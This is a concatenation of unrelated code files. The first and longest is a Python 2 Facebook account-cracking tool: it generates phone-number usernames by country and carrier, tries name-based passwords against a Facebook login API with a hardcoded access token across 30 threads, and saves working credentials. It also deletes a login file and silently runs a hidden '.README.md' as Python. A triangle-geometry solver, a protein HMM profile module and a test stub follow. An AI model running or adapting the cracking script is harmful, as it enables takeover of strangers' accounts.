pass2 = b['first_name']+'<PASSWORD>'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(<PASSWORD>)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mValid_OK\x1b[1;58m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mInvalid_CP\x1b[1;12m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] + '<PASSWORD>'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(<PASSWORD>)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mValid_OK\x1b[1;58m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mInvalid_CP\x1b[1;58m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = b['first_name'] + '<PASSWORD>'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(<PASSWORD>)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mValid_OK\x1b[1;58m]\x1b[1;58m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mInvalid_CP\x1b[1;58m]\x1b[1;58m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = b['first_name'] + '123456'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(<PASSWORD>)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mValid_OK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;58m|\x1b[1;97m ' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mInvalid_CP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;58m|\x1b[1;97m ' + pass5
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['last_name'] + '786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(<PASSWORD>)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mValid_OK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;58m|\x1b[1;97m ' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mInvalid_CP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;58m|\x1b[1;97m ' + pass6
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['last_name'] + '<PASSWORD>'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mValid_OK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;58m|\x1b[1;97m ' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mInvalid_CP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;58m|\x1b[1;97m ' + pass7
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;96m⊱⋕⊰══════════════════════════════════════════⊱⋕⊰"
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mProcess Telah Selesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File Sudah Tersimpan \033[1;91m: \033[1;97mout/checkpoint.txt")
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
menu()
def menu():
os.system('clear')
print logo
print 42*"\033[1;91m="
print '\033[1;94m[1]\033[1;92m Bangladesh \033[1;91m⇋ \033[1;94m[20]\033[1;93m Albania'
print '\033[1;94m[2]\033[1;92m USA \033[1;91m⇋ \033[1;94m[21]\033[1;93m Algeria'
print '\033[1;94m[3]\033[1;92m UK \033[1;91m⇋ \033[1;94m[22]\033[1;93m Andorra'
print '\033[1;94m[4] \033[1;92m India \033[1;91m⇋ \033[1;94m[23]\033[1;93m Armenia'
print '\033[1;94m[5]\033[1;92m Brazil \033[1;91m⇋ \033[1;94m[24]\033[1;93m Georgia'
print '\033[1;94m[6]\033[1;92m Japan \033[1;91m⇋ \033[1;94m[25]\033[1;93m Iceland'
print '\033[1;94m[7]\033[1;92m Korea \033[1;91m⇋ \033[1;94m[26]\033[1;93m China'
print '\033[1;94m[8]\033[1;92m Italy \033[1;91m⇋ \033[1;94m[27]\033[1;93m Bhutan'
print '\033[1;94m[9]\033[1;92m Spain \033[1;91m⇋ \033[1;94m[28]\033[1;93m Mongolia'
print '\033[1;94m[10]\033[1;92m Poland \033[1;91m⇋ \033[1;94m[29]\033[1;93m New Zealand'
print '\033[1;94m[11]\033[1;92m Pakistan \033[1;91m⇋ \033[1;94m[30]\033[1;93m Sudan'
print '\033[1;94m[12]\033[1;92m Indonisia \033[1;91m⇋ \033[1;94m[+]\033[1;93m Pak Nbr Fb Clone\033[1;94m[+] '
print '\033[1;94m[13]\033[1;92m Iran \033[1;91m⇋ \033[1;94m[A]\033[1;93m Telenor'
print '\033[1;94m[14]\033[1;92m Grecee \033[1;91m⇋ \033[1;94m[B]\033[1;93m Zong'
print '\033[1;94m[15]\033[1;92m Afghanistan \033[1;91m⇋ \033[1;94m[C]\033[1;93m Jazz'
print '\033[1;94m[16]\033[1;92m Syria \033[1;91m⇋ \033[1;94m[+]\033[1;93m Bangal Nbr Fb Clone\033[1;94m[+] '
print '\033[1;94m[17]\033[1;92m Turky \033[1;91m⇋ \033[1;94m[D]\033[1;93m Airtel/Robi'
print '\033[1;94m[18]\033[1;92m Iraq \033[1;91m⇋ \033[1;94m[E]\033[1;93m Grameenphone'
print '\033[1;94m[19]\033[1;92m France \033[1;91m⇋ \033[1;94m[F]\033[1;93m Banglalink'
print '[0]\033[1;97m Keluar '
print '>>\033[1;92m Selamat Datang Di Script \033[1;91m(\033[1;97mAnonymous Pace Usa\033[1;91m) '
print 42*"\033[1;91m="
action()
def action():
bch = raw_input('\n\033[1;91mPilih Nomer \033[1;93m>>>\033[1;95m ')
if bch =='':
print '[!] Isi dengan benar'
action()
elif bch =="1":
os.system("clear")
print (logo)
print("\033[1;93m175,165,191, 192, 193, 194, 195, 196, 197, 198, 199")
try:
c = raw_input("\033[1;96m Masukan Kode : ")
k="+880"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="2":
os.system("clear")
print (logo)
print("786, 815, 315, 256, 401, 718, 917, 202, 701, 303, 703, 803, 999, 708")
try:
c = raw_input(" Masukan Kode : ")
k="+1"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="3":
os.system("clear")
print (logo)
print("737, 706, 748, 783, 739, 759, 790")
try:
c = raw_input(" Masukan Kode : ")
k="+44"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="4":
os.system("clear")
print (logo)
print("954, 897, 967, 937, 700, 727, 965, 786, 874, 856, 566, 590, 527, 568, 578")
try:
c = raw_input(" Masukan Kode : ")
k="+91"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="5":
os.system("clear")
print (logo)
print("127, 179, 117, 853, 318, 219, 834, 186, 479, 113")
try:
c = raw_input(" Masukan Kode : ")
k="+55"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="6":
os.system("clear")
print (logo)
print("11, 12, 19, 16, 15, 13, 14, 18, 17")
try:
c = raw_input(" Masukan Kode : ")
k="+81"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="7":
os.system("clear")
print (logo)
print("1, 2, 3, 4, 5, 6, 7, 8, 9")
try:
c = raw_input(" Masukan Kode : ")
k="+82"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="8":
os.system("clear")
print (logo)
print("388, 390, 391, 371, 380, 368, 386, 384, 332, 344, 351, 328")
try:
c = raw_input(" Masukan Kode : ")
k="+39"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="9":
os.system("clear")
print (logo)
print("60, 76, 73, 64, 69, 77, 65, 61, 75, 68")
try:
c = raw_input(" Masukan Kode : ")
k="+34"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="10":
os.system("clear")
print (logo)
print("66, 69, 78, 79, 60, 72, 67, 53, 51")
try:
c = raw_input(" Masukan Kode : ")
k="+48"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="11":
os.system("clear")
print (logo)
print("\033[1;93m01, ~to~~, 49")
try:
c = raw_input(" Masukan Kode : ")
k="+1"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="12":
os.system("clear")
print (logo)
print("\033[1;93m82,57,89,56,81")
try:
c = raw_input(" Masukan Kode : ")
k="+1"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="13":
os.system("clear")
print (logo)
print("\033[1;93m901, 902, 903, 930, 933, 935, 936, 937, 938, 939")
try:
c = raw_input(" Masukan Kode : ")
k="+98"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="14":
os.system("clear")
print (logo)
print("\033[1;93m69,693,698,694,695")
try:
c = raw_input(" Masukan Kode : ")
k="+3069"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="15":
os.system("clear")
print (logo)
print("\033[1;96m070, 071, 079, 072, 073, 078, 077, 076, 074, 075")
try:
c = raw_input(" Masukan Kode : ")
k="+93"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="16":
os.system("clear")
print (logo)
print("\033[1;93m11, 21, 57, 41, 15, 52, 31, 23")
try:
c = raw_input(" Masukan Kode : ")
k="+963"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="17":
os.system("clear")
print (logo)
print("\033[1;96m322, 264, 416, 272, 472, 382, 312")
try:
c = raw_input(" Masukan Kode : ")
k="+90"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="18":
os.system("clear")
print (logo)
print("\033[1;96m079, 078, 073, 074")
try:
c = raw_input(" Masukan Kode : ")
k="+964"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="19":
os.system("clear")
print (logo)
print("\033[1;96m3, 2, 1, 4")
try:
c = raw_input(" Masukan Kode : ")
k="+33"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="20":
os.system("clear")
print (logo)
print("\033[1;93m67, 68, 69")
try:
c = raw_input(" Masukan Kode : ")
k="+355"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="21":
os.system("clear")
print (logo)
print("\033[1;96m49, 27, 43, 21,33, 49,26, 34,27,38, 29")
try:
c = raw_input(" Masukan Kode : ")
k="+213"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="22":
os.system("clear")
print (logo)
print("\033[1;95m8, 7, 3")
try:
c = raw_input(" Masukan Kode : ")
k="+376"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="23":
os.system("clear")
print (logo)
print("\033[1;95m22, 43, 23,53, 46,52, 38")
try:
c = raw_input(" Masukan Kode : ")
k="+374"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="24":
os.system("clear")
print (logo)
print("\033[1;95m366, 342, 362,365, 349")
try:
c = raw_input(" Masukan Kode : ")
k="+995"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="25":
os.system("clear")
print (logo)
print("\033[1;95m4, 5")
try:
c = raw_input(" Masukan Kode : ")
k="+354"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="26":
os.system("clear")
print (logo)
print("\033[1;95m139, 138, 137, 138")
try:
c = raw_input(" Masukan Kode : ")
k="+86"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="27":
os.system("clear")
print (logo)
print("\033[1;95m2, 7, 5")
try:
c = raw_input(" Masukan Kode : ")
k="+975"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="28":
os.system("clear")
print (logo)
print("\033[1;95m11")
try:
c = raw_input(" Masukan Kode : ")
k="+976"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="29":
os.system("clear")
print (logo)
print("\033[1;95m9, 24")
try:
c = raw_input(" Masukan Kode : ")
k="+64"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="30":
os.system("clear")
print (logo)
print("\033[1;95m 21, 41, 183, 81")
try:
c = raw_input(" Masukan Kode : ")
k="+249"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="A":
os.system("clear")
print (logo)
print("\033[1;95m 40, 41, 42, 43, 44, 45, 46, 47, 48")
try:
c = raw_input(" Masukan Kode : ")
k="+92"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="B":
os.system("clear")
print (logo)
print("\033[1;91m 10, 11, 12, 13, 14, 15, 16, 17, 18")
try:
c = raw_input(" Masukan Kode : ")
k="+92"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="C":
os.system("clear")
print (logo)
print("\033[1;91m 00, 01, 02, 03, 04, 05, 06")
try:
c = raw_input(" Masukan Kode : ")
k="+92"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="D":
os.system("clear")
print (logo)
print("\033[1;91m 16, 17, 18")
try:
c = raw_input(" Masukan Kode : ")
k="+80"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="E":
os.system("clear")
print (logo)
print("\033[1;91m 13, 14, 15,16, 18")
try:
c = raw_input(" Masukan Kode : ")
k="+80"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="F":
os.system("clear")
print (logo)
print("\033[1;91m 14, 19")
try:
c = raw_input(" Masukan Kode : ")
k="+80"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="0":
os.system('rm -rf login.txt')
keluar()
xxx = str(len(id))
print ('[✓] Total Nomor: '+xxx)
time.sleep(0.1)
print ('\033[1;91m[✓]\033[1;94m Mohon Tunggu Proses Sedang Berjalan ...')
time.sleep(0.1)
print ('[!] Untuk Menghentikan Proses Tekan CTRL Lalu Tekan z')
time.sleep(0.5)
print 42*"\033[1;91m="
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = <PASSWORD>
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m[Successful]\033[1;95m ' + k + c + user + ' >>> ' + pass1+'\n'+"\n"
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'>>>'+pass1+'\n')
okb.close()
oks.append(c+user+pass1)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;93m[Checkpoint]\033[1;96m ' + k + c + user + ' >>> ' + pass1+'\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'>>>'+pass1+'\n')
cps.close()
cpb.append(c+user+pass1)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;91m="
print '[✓]\033[1;93m Process Telah Selesai ...'
print '[✓]\033[1;92m Total OK/\033[1;96mCP : '+str(len(oks))+'/'+str(len(cpb))
print('[✓]\033[1;91m CP File Telah Disimpan : save/checkpoint.txt')
raw_input('\n[Press Enter To Go Back]')
os.system('python2 .README.md')
if __name__ == '__main__':
login()
| StarcoderdataPython |
3276796 | <filename>src/AOJ/ITP1_10_B.py
import math
def resolve():
a, b, C = map(float, input().split())
x = math.radians(C)
h = b * math.sin(x)
S = "{0:.8f}".format((a * h) / 2)
c = math.sqrt(a ** 2 + b ** 2 - 2 * a * b * math.cos(x))
L = "{0:.8f}".format(a + b + c)
print(S, L, h, sep="\n")
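
# Call the solver when the script is run directly (resolve() was defined but never invoked)
if __name__ == "__main__":
    resolve()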
| StarcoderdataPython |
13769 | from __future__ import annotations
from math import log
from typing import List, Type, Union
from imm import MuteState, Sequence, lprob_add, lprob_zero
from nmm import (
AminoAlphabet,
AminoLprob,
BaseLprob,
CodonLprob,
CodonMarg,
DNAAlphabet,
FrameState,
RNAAlphabet,
codon_iter,
)
from .codon_table import CodonTable
from .hmmer_model import HMMERModel
from .model import AltModel, EntryDistr, Node, NullModel, SpecialNode, Transitions
from .profile import Profile, ProfileID
__all__ = ["ProteinProfile", "create_profile"]
class ProteinProfile(Profile):
@classmethod
def create(
cls: Type[ProteinProfile],
profid: ProfileID,
factory: ProteinStateFactory,
null_aminot: AminoLprob,
core_nodes: List[Node],
core_trans: List[Transitions],
entry_distr: EntryDistr,
) -> ProteinProfile:
base_alphabet = factory.genetic_code.base_alphabet
R = factory.create(b"R", null_aminot)
null_model = NullModel.create(R)
special_node = SpecialNode(
S=MuteState.create(b"S", base_alphabet),
N=factory.create(b"N", null_aminot),
B=MuteState.create(b"B", base_alphabet),
E=MuteState.create(b"E", base_alphabet),
J=factory.create(b"J", null_aminot),
C=factory.create(b"C", null_aminot),
T=MuteState.create(b"T", base_alphabet),
)
alt_model = AltModel.create(
special_node,
core_nodes,
core_trans,
entry_distr,
)
# alt_model.set_fragment_length(self._special_transitions)
return cls(profid, base_alphabet, null_model, alt_model, False)
# @property
# def epsilon(self) -> float:
# nodes = self._alt_model.core_nodes()
# return nodes[0].M.epsilon
# @classmethod
# def create_from_binary(
# cls: Type[ProteinProfile],
# profid: ProfileID,
# null_model: nmm.Model,
# alt_model: nmm.Model,
# ):
# special_node = wrap.special_node(alt_model.hmm)
# core_nodes = wrap.core_nodes(alt_model.hmm)
# alt = AltModel.create_from_hmm(
# special_node, core_nodes, alt_model.hmm, alt_model.dp
# )
# null = NullModel.create_from_hmm(null_model.hmm)
# return cls(profid, alt_model.hmm.alphabet, null, alt, False)
# @property
# def window_length(self) -> int:
# return super().window_length
# @window_length.setter
# def window_length(self, length: int) -> None:
# if length < -1:
# raise ValueError("Length must be greater than or equal to -1.")
# if length == -1:
# length = 2 * 3 * self._alt_model.core_length
# self._window_length = length
def create_sequence(self, sequence: bytes) -> Sequence:
return Sequence.create(sequence, self.alphabet)
@property
def null_model(self) -> NullModel:
return self._null_model
@property
def alt_model(self) -> AltModel:
return self._alt_model
# def search(self, sequence: SequenceABC) -> SearchResults:
# self._set_target_length_model(len(sequence))
# alt_results = self._alt_model.viterbi(sequence, self.window_length)
# def create_fragment(
# seq: SequenceABC, path: Path, homologous: bool
# ):
# return ProteinFragment(seq, path, homologous)
# search_results = SearchResults(sequence, create_fragment)
# for alt_result in alt_results:
# subseq = alt_result.sequence
# # TODO: temporary fix for reading from binary file
# # and consequently alt and null model having different alphabets
# s = Sequence.create(bytes(subseq), self._null_model.hmm.alphabet)
# viterbi_score0 = self._null_model.loglikelihood(s)
# if len(alt_result.path) == 0:
# viterbi_score1 = lprob_invalid()
# else:
# viterbi_score1 = self._alt_model.loglikelihood(alt_result.sequence,
# alt_result.path)
# score = viterbi_score1 - viterbi_score0
# window = Interval(subseq.start, subseq.start + len(subseq))
# search_results.append(
# score, window, alt_result.path, viterbi_score1, viterbi_score0
# )
# return search_results
# def create_profile(
# hmm: HMMERModel,
# base_abc: Union[RNAAlphabet, DNAAlphabet],
# window_length: int = 0,
# epsilon: float = 0.1,
# ) -> ProteinProfile:
# amino_abc = hmm.alphabet
# assert isinstance(amino_abc, AminoAlphabet)
# lprobs = lprob_normalize(hmm.insert_lprobs(0))
# null_aminot = AminoLprob.create(amino_abc, lprobs)
# factory = ProteinStateFactory(CodonTable(base_abc, amino_abc), epsilon)
# nodes: List[Node] = []
# for m in range(1, hmm.model_length + 1):
# lprobs = lprob_normalize(hmm.match_lprobs(m))
# M = factory.create(f"M{m}".encode(), AminoLprob.create(amino_abc, lprobs))
# lprobs = lprob_normalize(hmm.insert_lprobs(m))
# I = factory.create(f"I{m}".encode(), AminoLprob.create(amino_abc, lprobs))
# D = MuteState.create(f"D{m}".encode(), base_abc)
# nodes.append(Node(M, I, D))
# trans: List[Transitions] = []
# for t in hmm.transitions:
# t.normalize()
# trans.append(t)
# profid = ProfileID(hmm.model_id.name, hmm.model_id.acc)
# prof = ProteinProfile.create(
# profid, factory, null_aminot, nodes, trans, EntryDistr.UNIFORM
# )
# prof.window_length = window_length
# return prof
def create_profile(
hmm: HMMERModel,
base_abc: Union[RNAAlphabet, DNAAlphabet],
window_length: int = 0,
epsilon: float = 0.1,
) -> ProteinProfile:
amino_abc = hmm.alphabet
assert isinstance(amino_abc, AminoAlphabet)
null_lprobs = hmm.null_lprobs
null_log_odds = [0.0] * len(null_lprobs)
null_aminot = AminoLprob.create(amino_abc, null_lprobs)
factory = ProteinStateFactory(CodonTable(base_abc, amino_abc), epsilon)
nodes: List[Node] = []
for m in range(1, hmm.model_length + 1):
lodds = [v0 - v1 for v0, v1 in zip(hmm.match_lprobs(m), null_lprobs)]
M = factory.create(f"M{m}".encode(), AminoLprob.create(amino_abc, lodds))
I = factory.create(
f"I{m}".encode(), AminoLprob.create(amino_abc, null_log_odds)
)
D = MuteState.create(f"D{m}".encode(), base_abc)
nodes.append(Node(M, I, D))
trans = hmm.transitions
profid = ProfileID(hmm.model_id.name, hmm.model_id.acc)
entry_distr = EntryDistr.OCCUPANCY
prof = ProteinProfile.create(
profid, factory, null_aminot, nodes, trans, entry_distr
)
prof.window_length = window_length
return prof
class ProteinStateFactory:
def __init__(
self,
gcode: CodonTable,
epsilon: float,
):
self._gcode = gcode
self._epsilon = epsilon
def create(self, name: bytes, aminot: AminoLprob) -> FrameState:
codonp = _create_codon_prob(aminot, self._gcode)
baset = _create_base_table(codonp)
codonm = CodonMarg.create(codonp)
return FrameState.create(name, baset, codonm, self._epsilon)
@property
def genetic_code(self) -> CodonTable:
return self._gcode
@property
def epsilon(self) -> float:
return self._epsilon
def _create_base_table(codonp: CodonLprob):
base_abc = codonp.alphabet
base_lprob = {base: lprob_zero() for base in base_abc.symbols}
norm = log(3)
for codon in codon_iter(base_abc):
lprob = codonp.get_lprob(codon)
triplet = codon.symbols
base_lprob[triplet[0]] = lprob_add(base_lprob[triplet[0]], lprob - norm)
base_lprob[triplet[1]] = lprob_add(base_lprob[triplet[1]], lprob - norm)
base_lprob[triplet[2]] = lprob_add(base_lprob[triplet[2]], lprob - norm)
assert len(base_lprob) == 4
bases = base_abc.symbols
assert len(bases) == 4
return BaseLprob.create(
base_abc,
(
base_lprob[bases[0]],
base_lprob[bases[1]],
base_lprob[bases[2]],
base_lprob[bases[3]],
),
)
def _create_codon_prob(aminot: AminoLprob, gencode: CodonTable) -> CodonLprob:
codonp = CodonLprob.create(gencode.base_alphabet)
codon_lprobs = []
lprob_norm = lprob_zero()
for i in range(len(aminot.alphabet.symbols)):
aa = aminot.alphabet.symbols[i : i + 1]
lprob = aminot.lprob(aa)
codons = gencode.codons(aa)
if len(codons) == 0:
continue
norm = log(len(codons))
for codon in codons:
codon_lprobs.append((codon, lprob - norm))
lprob_norm = lprob_add(lprob_norm, codon_lprobs[-1][1])
for codon, lprob in codon_lprobs:
codonp.set_lprob(codon, lprob - lprob_norm)
return codonp
| StarcoderdataPython |
156429 | import pytest
from recipes.tests.share import create_recipes
from users.tests.share import create_user_api
pytestmark = [pytest.mark.django_db]
URL = '/api/users/subscriptions/'
RESPONSE_KEYS = (
'id',
'email',
'username',
'first_name',
'last_name',
'is_subscribed',
'recipes',
'recipes_count',
)
RECIPE_FIELDS = ('id', 'name', 'image', 'cooking_time')
PAGINATION_PARAMS = ('count', 'next', 'previous', 'results')
def test_ok(as_anon, as_user, as_admin, admin, ingredients, tags):
another_user = create_user_api(as_anon)
create_recipes(as_admin, ingredients, tags)
